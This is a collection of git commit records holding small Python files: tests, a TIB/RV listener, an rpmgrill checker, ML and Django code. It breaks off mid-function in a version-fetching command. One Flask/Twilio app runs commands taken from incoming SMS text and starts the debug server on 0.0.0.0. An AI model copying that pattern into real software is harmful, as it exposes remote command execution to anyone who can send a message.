7ad1c83776c78e39b47792e6a8240686b04d3726 | Create main.v.py | jenerestain/smart-student | contracts/main.v.py | contracts/main.v.py | mit | Python | ||
6cffe1d30c16062e3a0414310aad89e7a04b2df6 | add handler-specific tests | keeprocking/pygelf,keeprocking/pygelf | tests/test_handler_specific.py | tests/test_handler_specific.py | from pygelf import GelfTlsHandler
import pytest
def test_tls_handler_creation():
    # presumably validate=True requires a CA certificate -- the handler
    # should reject this configuration
    with pytest.raises(ValueError):
        GelfTlsHandler(host='127.0.0.1', port=12204, validate=True)
    # presumably a keyfile without a matching certfile is also rejected
    with pytest.raises(ValueError):
        GelfTlsHandler(host='127.0.0.1', port=12204, keyfile='/dev/null')
| mit | Python | |
4121e3502f10f0ca36f696bf32e2dfe64bb19d0e | Create tibrvlisten.py | arienchen/pytibrv | examples/api/tibrvlisten.py | examples/api/tibrvlisten.py |
import sys
import getopt
from tibrv.events import *
def usage() :
print()
print("tibrvlisten.py [-service service] [-network network]")
print(" [-daemon daemon] <subject> ")
print()
sys.exit(1)
def get_params(argv):
    """Parse the tibrvlisten command line.

    Returns a (service, network, daemon, subject) tuple; any option the
    user did not supply is None.  Exits via usage() on malformed input.
    """
    try:
        # Bug fix: long options that take a value need a trailing '=' in
        # the getopt spec, otherwise '--service 7500' is rejected.
        opts, args = getopt.getopt(argv, '', ['service=', 'network=', 'daemon='])
    except getopt.GetoptError:
        usage()

    service = None
    network = None
    daemon = None

    for opt, arg in opts:
        # Bug fix: getopt reports long options as '--name', not '-name',
        # so the previous '-service' comparisons could never match.
        if opt == '--service':
            service = arg
        elif opt == '--network':
            network = arg
        elif opt == '--daemon':
            daemon = arg
        else:
            usage()

    # exactly one positional argument: the subject to listen on
    if len(args) != 1:
        usage()

    return service, network, daemon, args[0]
def my_callback(event, msg, closure):
    """Listener callback: print each received message with timestamps.

    `event` and `closure` are part of the tibrv callback signature but are
    unused here; the err status of each tibrv call is discarded.
    """
    err, send_subject = tibrvMsg_GetSendSubject(msg)
    err, reply_subject = tibrvMsg_GetReplySubject(msg)
    err, theString = tibrvMsg_ConvertToString(msg)
    err, localTime, gmtTime = tibrvMsg_GetCurrentTimeString()

    # request messages carry a reply subject; broadcasts do not
    if reply_subject is not None:
        print("{} ({}): subject={}, reply={}, message={}".format(
            localTime, gmtTime, send_subject, reply_subject, theString));
    else:
        print("{} ({}): subject={}, message={}".format(
            localTime, gmtTime, send_subject, theString));
# MAIN PROGRAM
def main(argv):
progname = argv[0]
service, network, daemon, subj = get_params(argv[1:])
err = tibrv_Open()
if err != TIBRV_OK:
print('{}: Failed to open TIB/RV: {}'.format('', progname, tibrvStatus_GetText(err)))
sys.exit(1)
err, tx = tibrvTransport_Create(service, network, daemon)
if err != TIBRV_OK:
print('{}: Failed to initialize transport: {}'.format('', progname, tibrvStatus_GetText(err)))
sys.exit(1)
tibrvTransport_SetDescription(tx, progname)
print("tibrvlisten: Listening to subject {}".format(subj))
err, listenID = tibrvEvent_CreateListener(TIBRV_DEFAULT_QUEUE, my_callback, tx, subj, None)
if err != TIBRV_OK:
print('{}: Error {} listening to {}'.format('', progname, tibrvStatus_GetText(err), subj))
sys.exit(2)
while tibrvQueue_Dispatch(TIBRV_DEFAULT_QUEUE) == TIBRV_OK:
pass
# In Linux/OSX
# CTRL-C will not interrupt the process
# CTRL-\ (SIGQUIT) would work
tibrv_Close()
sys.exit(0)
return
if __name__ == "__main__" :
main(sys.argv)
| bsd-3-clause | Python | |
5d8a9223905117e6b01099c318a2294e148f84b4 | Add rpmgrill check | khardix/coprcheck | coprcheck/checks.py | coprcheck/checks.py | """Checks to run on fetched builds."""
from contextlib import contextmanager
from distutils.spawn import find_executable
from functools import wraps
import fnmatch
import os
from shutil import rmtree
from subprocess import check_call
class MissingBinaryError(OSError):
"""The binary required for this check is not present in the $PATH."""
def require_bin(*binaries: str):
    """Decorator factory: require the named binaries to be on $PATH.

    The check runs on every call of the decorated function and raises
    MissingBinaryError naming the first binary that cannot be found.

    Arguments:
        binaries: Names of executables to look for.
    """
    def decorator(func):
        @wraps(func)
        def check_binaries(*args, **kwargs):
            # shutil.which replaces distutils.spawn.find_executable, which
            # is deprecated and removed in Python 3.12.
            from shutil import which
            for binary in binaries:
                if which(binary) is None:
                    raise MissingBinaryError(binary)
            return func(*args, **kwargs)
        return check_binaries
    return decorator
def rpm_dirs(root: str):
    """Generate paths to all directories under root that contain RPMs.

    Keyword arguments:
        root: The top of the searched tree.

    Yields:
        Paths from root (included) to each directory holding *.rpm files.
    """
    # avoid shadowing the `root` parameter inside the walk loop
    for dirpath, _, filenames in os.walk(root):
        if fnmatch.filter(filenames, '*.rpm'):
            yield dirpath
@require_bin('rpmgrill', 'rpmgrill-unpack-rpms')
def rpmgrill(project_root: str) -> None:
    """Run rpmgrill on all packages in the tree.

    * Assumes following directory structure:
        <project_root>/<distro>/<srpm_name>/*.rpm

      The rpmgrill is run for each <distro>/<srpm_name> variant.

    Keyword arguments:
        project_root: Path to the stored rpms tree.
    """

    @contextmanager
    def unpacked(path):
        """Unpacks and then cleans files required by rpmgrill.

        Keyword arguments:
            path: the directory to be unpacked and tested.

        Returns/yields:
            path to the unpacked files.
        """

        cmd = 'rpmgrill-unpack-rpms {0}'.format(path).split()
        check_call(cmd)

        resultdir = os.path.join(path, 'unpacked')
        yield resultdir
        # NOTE(review): cleanup is disabled, so the unpacked tree is left
        # on disk after each run; re-enable once debugging is finished.
        #rmtree(resultdir)

    # run rpmgrill once per directory that actually holds RPM files
    for directory in rpm_dirs(project_root):
        with unpacked(directory) as grillroot:
            cmd = ['rpmgrill', grillroot]
            check_call(cmd)
| agpl-3.0 | Python | |
df227e598aeda7646a6ae24384a1d9e7f9179dc2 | add vcs parsing test | Deepwalker/pundler | tests/test_vcs_requirements.py | tests/test_vcs_requirements.py | from pundle import parse_vcs_requirement
def test_parse_vcs_requirement():
    # Happy path: a git+https requirement line is parsed into
    # (lower-cased egg name, the original line, None) — presumably the
    # third slot is a frozen revision; confirm against pundle's parser.
    assert parse_vcs_requirement('git+https://github.com/pampam/PKG.git@master#egg=PKG') == \
        ('pkg', 'git+https://github.com/pampam/PKG.git@master#egg=PKG', None)
| bsd-2-clause | Python | |
5d7e4615657d947ec4a7500433f7008de223b622 | Add test | darkfeline/mir.dlsite,darkfeline/mir.dlsite | tests/test_dllist.py | tests/test_dllist.py | # Copyright (C) 2016, 2017 Allen Li
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import sys
def test_dllist():
    # Runs the dllist CLI as a subprocess: lines containing an RJ work
    # code are echoed (just the code), unmatched lines are dropped.
    proc = subprocess.run([sys.executable, '-m', 'mir.dlsite.cmd.dllist', '--no-info'],
                          input=b'foo RJ12345 bar\nbad\n',
                          stdout=subprocess.PIPE)
    assert proc.stdout == b'RJ12345\n'
| apache-2.0 | Python | |
08613bb395b4c964b15307165c7f472b59061da8 | Add tests for encode | tyrannosaurus/termformat | tests/test_encode.py | tests/test_encode.py | import termformat
from unittest import TestCase
class LargeMock:
    """Mixin that fakes a length of 2**32 (4294967296).

    Lets the encoder tests trigger size-limit errors without actually
    allocating multi-gigabyte objects.
    """

    def __len__(self):
        return 4294967296


class LargeAtomMock(LargeMock, str):
    """A str (atom source) reporting an oversized length."""


class LargeListMock(LargeMock, list):
    """A list reporting a length beyond the 32-bit limit."""


class LargeTupleMock(LargeMock, tuple):
    """A tuple reporting a length beyond the 32-bit limit."""


class LargeStringMock(LargeMock, str):
    """A str (binary payload) reporting an oversized length."""
class TermFormatEncoderTest(TestCase):
    """Checks termformat.encode against the Erlang External Term Format.

    Every expected value starts with the version byte ``\\x83`` followed
    by a type tag (e.g. ``d`` atom, ``a``/``b``/``n`` integers, ``F``
    float, ``l``/``h``/``i`` containers, ``m`` binary).
    NOTE: several locals shadow builtins (``bytes``, ``list``, ``tuple``);
    left untouched here since they are method-local.
    """
    # --- atoms: booleans/None encode as the atoms false/true/nil ---
    def test_encode_false(self):
        bytes = termformat.encode(False)
        self.assertEqual(bytes, b'\x83d\x00\x05false')
    def test_encode_true(self):
        bytes = termformat.encode(True)
        self.assertEqual(bytes, b'\x83d\x00\x04true')
    def test_encode_none(self):
        bytes = termformat.encode(None)
        self.assertEqual(bytes, b'\x83d\x00\x03nil')
    # --- integers: small (1 byte), medium (4 bytes), big (bignum) ---
    def test_encode_small_int(self):
        bytes = termformat.encode(20)
        self.assertEqual(bytes, b'\x83a\x14')
    def test_encode_medium_int(self):
        bytes = termformat.encode(300)
        self.assertEqual(bytes, b'\x83b\x00\x00\x01,')
    def test_encode_large_int(self):
        bytes = termformat.encode(4294967296)
        self.assertEqual(bytes, b'\x83n\x05\x00\x00\x00\x00\x00\x01')
    def test_encode_large_negative_int(self):
        bytes = termformat.encode(-4294967296)
        self.assertEqual(bytes, b'\x83n\x05\x01\x00\x00\x00\x00\x01')
    def test_encode_float(self):
        bytes = termformat.encode(3.14)
        self.assertEqual(bytes, b'\x83F@\t\x1e\xb8Q\xeb\x85\x1f')
    # --- containers: lists, tuples, and their size-limit failures ---
    def test_encode_list(self):
        bytes = termformat.encode([1, 2, 3])
        self.assertEqual(bytes, b'\x83l\x00\x00\x00\x03a\x01a\x02a\x03j')
    def test_encode_empty_list(self):
        bytes = termformat.encode([])
        self.assertEqual(bytes, b'\x83j')
    def test_encode_large_list(self):
        # LargeListMock fakes a length > 2**32-1, which must be rejected.
        with self.assertRaises(ValueError):
            list = LargeListMock()
            bytes = termformat.encode(list)
    def test_encode_small_tuple(self):
        bytes = termformat.encode((1, 2, 3))
        self.assertEqual(bytes, b'\x83h\x03a\x03a\x02a\x03') if False else None
        bytes = termformat.encode((1, 2, 3))
        self.assertEqual(bytes, b'\x83h\x03a\x01a\x02a\x03')
    def test_encode_large_tuple(self):
        # 768 elements: needs the LARGE_TUPLE ('i') tag with 4-byte arity.
        bytes = termformat.encode((1, 2, 3) * 256)
        self.assertEqual(bytes[:5], b'\x83i\x00\x00\x03')
    def test_encode_very_large_tuple(self):
        with self.assertRaises(ValueError):
            tuple = LargeTupleMock()
            bytes = termformat.encode(tuple)
    # --- atoms from ':name' strings ---
    def test_encode_atom(self):
        bytes = termformat.encode(":foo")
        self.assertEqual(bytes, b'\x83d\x00\x03foo')
    def test_encode_atom_without_name(self):
        # A bare ':' has no atom name and must be rejected.
        with self.assertRaises(ValueError):
            bytes = termformat.encode(":")
    def test_encode_large_atom(self):
        # Atom names are limited (255 bytes); oversized length must fail.
        with self.assertRaises(ValueError):
            atom = LargeAtomMock()
            bytes = termformat.encode(atom)
    def test_encode_not_supported_data_type(self):
        # Dicts have no ETF mapping in this encoder.
        with self.assertRaises(ValueError):
            bytes = termformat.encode({'dictionary': 'item'})
    # --- strings/bytes all encode as BINARY_EXT ('m') ---
    def test_encode_string(self):
        bytes = termformat.encode('foo')
        self.assertEqual(bytes, b'\x83m\x00\x00\x00\x03foo')
    def test_encode_empty_string(self):
        bytes = termformat.encode('')
        self.assertEqual(bytes, b'\x83m\x00\x00\x00\x00')
    def test_encode_large_string(self):
        with self.assertRaises(ValueError):
            string = LargeStringMock()
            bytes = termformat.encode(string)
    def test_encode_unicode(self):
        bytes = termformat.encode(u'foo')
        self.assertEqual(bytes, b'\x83m\x00\x00\x00\x03foo')
    def test_encode_bytes(self):
        bytes = termformat.encode(b'foo')
        self.assertEqual(bytes, b'\x83m\x00\x00\x00\x03foo')
| mit | Python | |
722b11eab90c6d532ea96209f7632e17181c0b3e | Test if points are in footprint | NLeSC/PattyAnalytics | tests/test_inpoly.py | tests/test_inpoly.py | import unittest
import pcl
import numpy as np
from patty_registration.conversions import loadLas, loadCsvPolygon
from numpy.testing import assert_array_equal, assert_array_almost_equal
from matplotlib import path
class TestInPoly(unittest.TestCase):
    """Smoke test: filter a LAS point cloud by its footprint polygon."""

    def testInPoly(self):
        # NOTE(review): relies on data files being present relative to the
        # working directory, and makes no assertion on the result — it
        # only checks that points_in_poly runs without raising.
        fileLas = 'data/footprints/162.las'
        filePoly = 'data/footprints/162.las_footprint.csv'
        pc = loadLas(fileLas)
        footprint = loadCsvPolygon(filePoly)
        pc2 = points_in_poly(pc, footprint)
def point_in_poly(point, polyPath):
    # True if the (x, y) projection of `point` lies inside `polyPath`
    # (a matplotlib.path.Path); any z coordinate is ignored.
    return polyPath.contains_point(point[:2])
def points_in_poly(pc, poly):
    # Build the footprint path from the polygon's x/y columns only.
    polyPath = path.Path(poly[:,:2])
    points = np.asarray(pc)
    # Points are stored relative to pc.offset, while the footprint is in
    # absolute coordinates — hence the `point + pc.offset` shift.
    # NOTE(review): O(n) Python loop; Path.contains_points would vectorize.
    return np.array([ point for point in points if point_in_poly(point+pc.offset, polyPath) ])
| apache-2.0 | Python | |
01494bfbc15987a2b925ca7990e8704767c9457b | Create secret.py | DmytroLitvinov/kuna | tests/secret.py | tests/secret.py | public_key = 'xxx'
# Placeholder API secret for the test-suite; never commit a real key.
private_key = 'yyy'
| mit | Python | |
6b132720c1f7596db34a2fdab3f6ca0134aaabc9 | create new model to store uploaded images with id | openego/oeplatform,openego/oeplatform,openego/oeplatform,openego/oeplatform | api/migrations/0001_initial.py | api/migrations/0001_initial.py | # Generated by Django 3.0 on 2020-11-07 13:11
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the UploadedImages table."""

    # First migration of the app: no dependencies.
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='UploadedImages',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Uploaded files are stored under image/<year>/.
                ('image', models.ImageField(upload_to='image/%Y/')),
            ],
        ),
    ]
| agpl-3.0 | Python | |
ca90d083005e1c29b3b394d556296fd8e734c40a | implement top extrapolation module | morgenst/PyAnalysisTools,morgenst/PyAnalysisTools,morgenst/PyAnalysisTools | PyAnalysisTools/AnalysisTools/TopExtrapolationModule.py | PyAnalysisTools/AnalysisTools/TopExtrapolationModule.py | from PyAnalysisTools.base import _logger
import ROOT
class TopExtrapolationModule(object):
    """Data-modifier plugin that overwrites ttbar histogram bins with
    values extrapolated from per-region fitted functions.

    NOTE: Python 2 code (``iteritems``, print statement, ``map`` treated
    as a list).
    """

    def __init__(self, **kwargs):
        """kwargs: per-region configs plus a 'functions' mapping of
        function templates (TF1 formula strings with [i] placeholders)."""
        _logger.debug('Initialising TopExtrapolationModule')
        self.build_functions(**kwargs)
        self.type = "DataModifier"

    def build_functions(self, **kwargs):
        """Build, per region, (nominal/down/up TF1s, stitch point)."""
        def build_fct(name, params):
            # Three copies of the formula: nominal, param-1sigma, param+1sigma.
            fcts = [kwargs['functions'][name]] * 3
            for i, param in enumerate(params):
                # HACK: params come in as strings, e.g. "(value, error)";
                # eval() executes config text — only safe for trusted configs.
                param = eval(param)
                fcts[0] = fcts[0].replace('[{:d}]'.format(i), str(param[0]))
                fcts[1] = fcts[1].replace('[{:d}]'.format(i), str(param[0] - param[1]))
                fcts[2] = fcts[2].replace('[{:d}]'.format(i), str(param[0] + param[1]))
            return map(lambda f: ROOT.TF1("", f), fcts)
        self.functions = {}
        for reg_name, cfg in kwargs.iteritems():
            if reg_name == 'functions':
                continue
            # Value is a 2-tuple: ([TF1 nominal, down, up], stitch threshold).
            self.functions[reg_name] = build_fct(cfg['func'], cfg['params']), cfg['stitch']

    def get_extrapolated_bin_content(self, region, xmin, xmax=None, lumi=1.):
        """Integral of the nominal fit over [xmin, xmax], scaled by lumi.

        Returns None below the region's stitch point (data kept as-is).
        """
        if xmax is None:
            xmax = 1e12
        if xmin < self.functions[region][1]:
            return None
        return lumi * self.functions[region][0][0].Integral(xmin, xmax)

    def execute(self, histograms):
        """Replace ttbar bins above the stitch point with fit integrals.

        The region is inferred by substring match on the histogram name;
        assumes exactly one region matches — TODO confirm.
        """
        top_hist = histograms['ttbar']
        region = [r for r in self.functions.keys() if r in top_hist.GetName()][0]
        # Leftover debug output (Python 2 print statement).
        print region
        for i in range(top_hist.GetNbinsX() + 1):
            # 139. presumably the integrated luminosity in /fb — verify.
            bin_content = self.get_extrapolated_bin_content(region, top_hist.GetXaxis().GetBinLowEdge(i),
                                                            top_hist.GetXaxis().GetBinUpEdge(i), 139.)
            if bin_content is None:
                continue
            top_hist.SetBinContent(i, bin_content)
| mit | Python | |
181ca07d3d7bdb3e07b8f9e608ebd8e42235a38c | test module; | terentjew-alexey/market-analysis-system | mas_vae/models.py | mas_vae/models.py | from keras import backend as K
from keras.models import Model, Sequential
from keras.layers import Input, Dense, concatenate
from keras.layers import Flatten, Reshape, BatchNormalization
from keras.layers import Conv2D, MaxPooling2D, Conv2DTranspose
from mas_tools.ml import save_model_arch
def deep_conv2d_ae(input_shape):
    """Build a deep convolutional autoencoder for OHLC-style 2-D input.

    Arguments:
        input_shape: (rows, cols, channels) tuple, e.g. (4, 20, 1).

    Returns:
        (encoder, decoder, autoencoder) Keras models; the autoencoder is
        decoder(encoder(x)) end to end.
    """
    latent_dim = 32
    kernel_size = (1, 5)
    kernel_pooling = (1, 2)  # NOTE(review): defined but never used below
    strides = (1, 1)
    # Encoder: two Conv2D stages, then flatten into the latent vector.
    input_tensor = Input(shape=input_shape, name='encoder_input')
    x = Conv2D(filters=32,
               kernel_size=kernel_size,
               padding='same',
               activation='relu',
               strides=strides,
               input_shape=input_shape)(input_tensor)
    x = Conv2D(filters=64,
               kernel_size=kernel_size,
               padding='same',
               activation='relu',
               strides=strides)(x)
    # shape info needed to build decoder model
    shape = K.int_shape(x)
    # shape = enc.output_shape
    # generate latent vector Q(z|X)
    x = Flatten()(x)
    x = Dense(latent_dim, activation='relu', name='encoder_output')(x)
    # Decoder: mirror the encoder with Conv2DTranspose layers.
    latent_inputs = Input(shape=(latent_dim,), name='latent_input')
    y = Dense(shape[1] * shape[2] * shape[3], activation='relu')(latent_inputs)
    y = Reshape((shape[1], shape[2], shape[3]))(y)
    y = Conv2DTranspose(filters=64,
                        kernel_size=kernel_size,
                        padding='same',
                        activation='relu',
                        strides=strides)(y)
    y = Conv2DTranspose(filters=32,
                        kernel_size=kernel_size,
                        padding='same',
                        activation='relu',
                        strides=strides)(y)
    y = Conv2DTranspose(filters=1,
                        kernel_size=kernel_size,
                        padding='same',
                        activation='relu',
                        strides=strides,
                        name='decoder_output')(y)
    # Create models
    encoder = Model(input_tensor, x, name='encoder')
    decoder = Model(latent_inputs, y, name='decoder')
    autoencoder = Model(input_tensor, decoder(encoder(input_tensor)), name='ae')
    return encoder, decoder, autoencoder
if __name__ == "__main__":
    # Build the autoencoder, save each sub-model's architecture diagram
    # to a hard-coded local path, and print the layer summaries.
    path = 'E:/Projects/market-analysis-system/'
    enc, dec, ae = deep_conv2d_ae((4, 20, 1))
    save_model_arch(enc, path+'ae_enc')
    enc.summary()
    save_model_arch(dec, path+'ae_dec')
    dec.summary()
    save_model_arch(ae, path+'ae')
    ae.summary()
0515cdac701b6fbd4bb9281b6412313ad31072cc | Add file to run flask app | ueg1990/twilix,ueg1990/twilix | app.py | app.py | from flask import Flask, request
from twilio import twiml
import subprocess
from cmd import cmds
app = Flask(__name__)
import os
# Twilio credentials. Currently hard-coded placeholders; the commented
# os.environ lookups show the intended environment-based configuration.
ACCOUNT_SID = "" #os.environ['ACCOUNT_SID']
AUTH_TOKEN = "" #os.environ['AUTH_TOKEN']
APP_SID = "Twilix" #os.environ['APP_SID']
CALLER_ID = "+14389855700" #os.environ['CALLER_ID']
#CALLER_ID = "+18175985398" #os.environ['CALLER_ID']
@app.route("/")
def index():
    # Trivial liveness check for the root URL.
    return "Hello, world, motherfucker!!!"
@app.route('/sms', methods=['POST'])
def sms():
    """Twilio SMS webhook: run the texted command and reply with its output.

    The message body is lower-cased and split on whitespace; the first
    token selects a handler from the `cmds` mapping, the rest are its
    arguments. Piped commands ('|') are not supported yet.
    """
    response = twiml.Response()
    user_input = request.form['Body']
    if '|' in user_input:
        pass
    else:
        # Fixed: original called .spit(), which raises AttributeError.
        args = user_input.lower().split()
        # Fixed: original called args[0] (a string) as a function; dispatch
        # through the cmds mapping imported from cmd instead — assumes cmds
        # maps command name -> callable, TODO confirm.
        output = cmds[args[0]](args[1:])
        response.sms(output)
    return str(response)
if __name__ == "__main__":
    #app.run(debug=True)
    # NOTE(review): debug mode combined with binding to all interfaces
    # (0.0.0.0) exposes the Werkzeug debugger to the network.
    app.debug = True
    app.run(host='0.0.0.0')
| mit | Python | |
a0ee0998457976aa45b3d3a462f2b2aab1bfb15f | add objects module | sandybee/python-crossprocess-transient-object | crossprocess/objects.py | crossprocess/objects.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
class SimpleObject(object):
    """A minimal named object used for cross-process transfer demos."""

    def __init__(self, name):
        """Store *name* on a name-mangled attribute to keep it private."""
        self.__name = name

    def get_name(self):
        """Return the name this object was constructed with."""
        return self.__name

    def __repr__(self):
        # Backward-compatible addition for debuggability.
        return "{0}({1!r})".format(type(self).__name__, self.__name)
| mit | Python | |
8c276c8c2e45ff0fe634669ea65d0df40c96463c | Add python example using metadata | mapequation/infomap,mapequation/infomap,mapequation/infomap,mapequation/infomap | examples/python/metadata.py | examples/python/metadata.py | from infomap import infomap
# Two-level clustering with metadata influence (meta-data rate 0.3).
myInfomap = infomap.Infomap("--two-level --meta-data-rate 0.3")
# Add weight as an optional third argument
# Directed links forming two triangles (0-1-2 and 3-4-5) joined via 0-3.
myInfomap.addLink(0, 1)
myInfomap.addLink(0, 2)
myInfomap.addLink(0, 3)
myInfomap.addLink(1, 0)
myInfomap.addLink(1, 2)
myInfomap.addLink(2, 1)
myInfomap.addLink(2, 0)
myInfomap.addLink(3, 0)
myInfomap.addLink(3, 4)
myInfomap.addLink(3, 5)
myInfomap.addLink(4, 3)
myInfomap.addLink(4, 5)
myInfomap.addLink(5, 4)
myInfomap.addLink(5, 3)
network = myInfomap.network()
# Attach one categorical metadata value per node (pairs share a value).
network.addMetaData(0, 1)
network.addMetaData(1, 1)
network.addMetaData(2, 2)
network.addMetaData(3, 2)
network.addMetaData(4, 3)
network.addMetaData(5, 3)
myInfomap.run()
print(f"Found {myInfomap.numTopModules()} modules with codelength: {myInfomap.codelength()}")
print("\n#node module")
for node,module in myInfomap.getModules().items():
    print(f"{node} {module}")
| agpl-3.0 | Python | |
7115d25c57404a42bc29513eb514073747d876ce | Add platform_map to remap Platform.os and arch based on config | nerdvegas/rez,instinct-vfx/rez,nerdvegas/rez,instinct-vfx/rez | src/rez/utils/platform_mapped.py | src/rez/utils/platform_mapped.py | import re
def platform_mapped(func):
"""
Decorates functions for lookups within a config.platform_map dictionary.
The first level key is mapped to the func.__name__ of the decorated function.
Regular expressions are used on the second level key, values.
Note that there is no guaranteed order within the dictionary evaluation. Only the first matching
regular expression is being used.
For example:
config.platform_map = {
"os": {
r"Scientific Linux-(.*)": r"Scientific-\1", # Scientific Linux-x.x -> Scientific-x.x
r"Ubuntu-14.\d": r"Ubuntu-14, # Any Ubuntu-14.x -> Ubuntu-14
},
"arch": {
"x86_64": "64bit", # Maps both x86_64 and amd64 -> 64bit
"amd64": "64bit",
},
}
"""
def inner(*args, **kwargs):
# Since platform is being used within config lazy import config to prevent circular dependencies
from rez.config import config
# Original result
result = func(*args, **kwargs)
# The function name is used as primary key
if func.__name__ in config.platform_map:
for key, value in config.platform_map[func.__name__].iteritems():
result, changes = re.subn(key, value, result)
if changes > 0:
break
return result
return result
return inner
| apache-2.0 | Python | |
904a37589d8ef0f7b69d9b0f83f41c94fbbfcde6 | Update 1.7 migrations | aldryn/aldryn-categories,aldryn/aldryn-categories | aldryn_categories/migrations/0003_auto_20150128_1359.py | aldryn_categories/migrations/0003_auto_20150128_1359.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Restrict translation language choices and enforce per-language
    slug uniqueness on CategoryTranslation."""

    dependencies = [
        ('aldryn_categories', '0002_auto_20150109_1415'),
    ]

    operations = [
        migrations.AlterField(
            model_name='categorytranslation',
            name='language_code',
            field=models.CharField(db_index=True, max_length=15, verbose_name='Language', choices=[(b'en', b'English'), (b'de', b'German'), (b'fr', b'French')]),
            preserve_default=True,
        ),
        # A slug may repeat across languages, but must be unique within one.
        migrations.AlterUniqueTogether(
            name='categorytranslation',
            unique_together=set([('language_code', 'master'), ('language_code', 'slug')]),
        ),
    ]
| bsd-3-clause | Python | |
8a1448ed3bd426d11f6222d63f77604ec132b2da | Add an example for pre signed URL | openstack/python-zaqarclient | examples/signed_url_auth.py | examples/signed_url_auth.py | # Copyright 2016 Catalyst IT Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from zaqarclient.queues.v2 import client
URL = 'http://localhost:8888'
def create_post_delete(queue_name, messages):
    """Presigned queue example.

    Creates a queue, posts messages to it, then reads and deletes them,
    with the ``signed-url`` auth strategy enabled on the Zaqar server.

    :param queue_name: The name of the queue
    :type queue_name: `six.text_type`
    :param messages: Messages to post.
    :type messages: list
    """
    # NOTE(review): signature/expires are empty placeholders here — a real
    # pre-signed URL supplies both; os_project_id is a sample project.
    conf = {'auth_opts':
            {'backend': 'signed-url',
             'options': {'signature': '',
                         'expires': '',
                         'methods': ['GET', 'PATCH', 'POST', 'PUT'],
                         'paths': ['/v2/queues/beijing/claims'],
                         'os_project_id': '2887aabf368046a3bb0070f1c0413470'}
             }
            }
    cli = client.Client(URL, conf=conf)
    queue = cli.queue(queue_name)
    queue.post(messages)
    # echo=True returns our own messages too; print then delete each one.
    for msg in queue.messages(echo=True):
        print(msg.body)
        msg.delete()
if __name__ == '__main__':
    # Seed 20 small messages with a 360-second TTL and run the example.
    messages = [{'body': {'id': idx}, 'ttl': 360}
                for idx in range(20)]
    create_post_delete('beijing', messages)
| apache-2.0 | Python | |
59f37975bb06edd38bbcdea6f0ea031f079ba2c3 | Add an utility function to load YAML | hawaii-desktop/builder,hawaii-desktop/builder,hawaii-desktop/builder,hawaii-desktop/builder,hawaii-desktop/builder | lib/hawaiibuildbot/common/utils.py | lib/hawaiibuildbot/common/utils.py | #
# This file is part of Hawaii.
#
# Copyright (C) 2015 Pier Luigi Fiorini <pierluigi.fiorini@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
def loadYaml(fileName):
    """Parse the YAML file at *fileName* and return the resulting object.

    Uses the C-accelerated loader when PyYAML was built with libyaml,
    falling back to the pure-Python one otherwise.
    """
    from yaml import load
    try:
        from yaml import CLoader as Loader
    except ImportError:
        from yaml import Loader
    # Context manager closes the file; the original leaked the handle.
    with open(fileName, "r") as stream:
        return load(stream, Loader=Loader)
| agpl-3.0 | Python | |
e5a7f3fec4dc30273e582ac1a4d0374f42175c76 | Add rough script to import version data from prod API for an add-on (#13869) | bqbn/addons-server,diox/olympia,diox/olympia,eviljeff/olympia,bqbn/addons-server,wagnerand/addons-server,diox/olympia,mozilla/olympia,bqbn/addons-server,mozilla/addons-server,wagnerand/addons-server,diox/olympia,eviljeff/olympia,mozilla/addons-server,mozilla/olympia,mozilla/addons-server,wagnerand/addons-server,mozilla/addons-server,wagnerand/addons-server,mozilla/olympia,mozilla/olympia,eviljeff/olympia,eviljeff/olympia,bqbn/addons-server | src/olympia/landfill/management/commands/fetch_prod_versions.py | src/olympia/landfill/management/commands/fetch_prod_versions.py | import requests
from os.path import basename
from urllib.parse import urlparse
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.management.base import BaseCommand, CommandError
from django.db.transaction import atomic
from olympia import amo
from olympia.amo.tests import version_factory
from olympia.addons.models import Addon
class KeyboardInterruptError(Exception):
    """Picklable stand-in for KeyboardInterrupt.

    NOTE(review): not referenced anywhere in this module — presumably kept
    for multiprocessing workers, where raw KeyboardInterrupt does not
    propagate cleanly; confirm before removing.
    """
    pass
class Command(BaseCommand):
    """Download versions for a particular add-on from AMO public data."""

    # Public v4 API endpoint; %(slug)s is interpolated per add-on.
    VERSIONS_API_URL = (
        'https://addons.mozilla.org/api/v4/addons/addon/%(slug)s/versions/'
    )

    def add_arguments(self, parser):
        """Register the single positional argument: the add-on slug."""
        parser.add_argument('slug', type=str)

    def handle(self, *args, **options):
        """Entry point; refuses to run outside DEBUG to protect prod data."""
        if not settings.DEBUG:
            raise CommandError(
                'As a safety precaution this command only works if DEBUG=True.'
            )
        self.fetch_versions_data(**options)

    def get_max_pages(self, slug):
        """Return the number of result pages the API reports for *slug*."""
        response = requests.get(self.VERSIONS_API_URL % {'slug': slug})
        return response.json()['page_count']

    def fetch_versions_data(self, **options):
        """Look up the local Addon and import every page of its versions."""
        self.addon = Addon.objects.get(slug=options['slug'])
        slug = self.addon.slug
        pages = range(1, self.get_max_pages(slug) + 1)
